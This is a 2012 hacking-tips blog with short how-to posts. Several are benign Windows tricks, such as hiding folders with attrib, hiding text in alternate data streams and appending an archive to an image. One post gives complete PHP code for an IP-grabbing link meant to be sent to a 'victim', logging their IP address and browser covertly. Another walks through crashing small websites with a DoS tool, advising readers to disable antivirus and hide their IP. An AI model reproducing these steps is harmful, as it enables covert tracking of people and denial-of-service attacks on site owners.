Showing posts with label howto. Show all posts
Showing posts with label howto. Show all posts

Wednesday, 7 November 2012

How to export the result of ping command

crackthesecurity | 06:38 | | | | Be the first to comment!

Step 1

Open the command prompt WINDOWS + R

Step 2

Type the following command C:\>ping nameofwebsite.com >> c:\Test.txt -t
For example if you want to ping google.com
C:\>ping google.com/>> c:\Test.txt -t
Read More...


How to get The ip Address of your Victim

crackthesecurity | 06:20 | | Be the first to comment!

Step 1

Create a free hosting site from here My3gb

Step 2

Copy below php code and paste in notepad and save it as ip.php

<?php
$myFile = "ip.html";
$fh = fopen($myFile, 'a+') or die("can't open file");
$stringData ="Date:".date('Y-m-d H:i:s')."<br/>Ip:".$_SERVER['REMOTE_ADDR']."<br/>Browser:".$_SERVER['HTTP_USER_AGENT']."<br />\n" ;
fwrite($fh, $stringData);
fclose($fh);
?>
<?php
header( 'Location: http://crackthesec.blogspot.com/' ) ;
$ip = $_SERVER['REMOTE_ADDR'];
$hostaddress = gethostbyaddr($ip);
$browser = $_SERVER['HTTP_USER_AGENT'];
$referred = $_SERVER['HTTP_REFERER']; // a quirky spelling mistake that stuck in php

print "<strong>Display IP address:</strong><br />\n";
print "$ip<br /><br />\n";
print "<strong>More detailed host address:</strong><br />\n";
print "$hostaddress<br /><br />\n";
print "<strong>Display browser info</strong>:<br />\n";
print "$browser<br /><br />\n";
print "<strong>Where you came from (if you clicked on a link to get here</strong>:<br />\n";
if ($referred == "") {
print "Page was directly requested";
}
else {
print "$referred";
}
?> 

Step3

upload the php script to public folder

Step 4

Now send the link to your victim when the link is opened the IP address will displayed and stored

To view the IP Address

Replace your php link with ip.html
Example :
This is my Demo Link
http://crackthesec.my3gb.com/ip.php
replace as http://crackthesec.my3gb.com/ip.html
Read More...


Wednesday, 24 October 2012

How to hide Folder without any software using cmd

crackthesecurity | 08:57 | | | Be the first to comment!

Step 1

Open your command promt

Step 2 : To Hide

Now type attrib +s +h Path\Folder_Name
Eg : attrib +s +h h:\CTS

Step 3 : To UnHide

Now type attrib -s -h Path\Folder_Name
Eg : attrib -s -h h:\CTS
Note you can also view the hidden folder by



Click on YES and you can now see your hidden folder

You can also hide any files with their extension

Eg : attrib +s +h h:\CTS\a.jpg
Read More...


Tuesday, 23 October 2012

An Interesting Trick to Hide the Data in Notepad.

crackthesecurity | 00:11 | | | | Be the first to comment!

Steps to hide text in a Notepad

  • Open your command prompt
  • Type cd.. to move to C:\> drive or Type cd desktop to move to your desktop.
  • Type the below code in your command prompt
notepad filename.txt:hidden
  • Write some data and save (Ctrl+s) the file.
  • Browse to the file location and Open filename.txt you cannot see any data in the file.

To retrieve the hidden data open command prompt and type the same command.

>notepad filename.txt:hidden
Read More...


Monday, 22 October 2012

How to Hide your Secret Files inside an Image Without any Software

crackthesecurity | 06:15 | | | Be the first to comment!

NOTE: you must need two images and your files should be Compressed into .rar or .zip or anyother extension

Step 1

Open your command prompt

Step 2

Now Type the following commandline
copy /b [the_image] + [rar_file_to_hide] [image_result_name]
e.g : copy /b a.jpg + b.rar c.jpg
Now your a.jpg image & b.rar File will be copied inside the c.jpg

To view the hidden file open the c.jpg using winzip or winrar etc.

Read More...


Thursday, 18 October 2012

How to crash small websites using RDOS | DOS tutorial

crackthesecurity | 01:53 | | | Be the first to comment!

TOOLS REQUIRED:

NOTE: Use At your own RISK

You can Google the Tools above and download it and when you Download rDOS your antivirus may or may not detect the rDOS as a thread so if it Detects and delete it then try TURNING-OFF your Antivirus & Download it and then your IP Hiding Tool not to Trace you..

STEP 1

First of all you need to know the IP address of the website you want to crash.
Use ping command in windows to get the ip address of the website.
open CMD and enter ping www.website.com

Now you have the IP address of the website.

STEP 2

Now use Port scanner to check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack
otherwise you can crash this website.

STEP 3

 Now open your  rDos. Enter your victims ip that you got from step 1.
It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work.
Read More...


Free online file converter

crackthesecurity | 01:17 | | | Be the first to comment!

How to Use this service

Go to www.online-convert.com and select the tool you want to use. Suppose i wish to convert an image to PNG format. Select the conversion and click on go.

Now browse the file or enter the web URL of the image. Select the quality settings and then click on convert.

After the conversion, you will find the download link of the converted file.

Download the file and enjoy. This is a nice online converter file which can be used any time from any where.
 
Read More...


How to Regain Access to your Hacked Facebook Account Easily

crackthesecurity | 00:48 | | | | | Be the first to comment!

Step 1

Visit http://www.facebook.com/hacked.

Step 2

Click My Account Is Compromised as shown in below screenshot

Step 3

Now enter your Email,Phone Or Username and Click on Search

And now identify your account & now click on continue without entering the password and then you will be redirected to another page as show in Step 4.

Step 4

Now choose your option to reset your password....

Read More...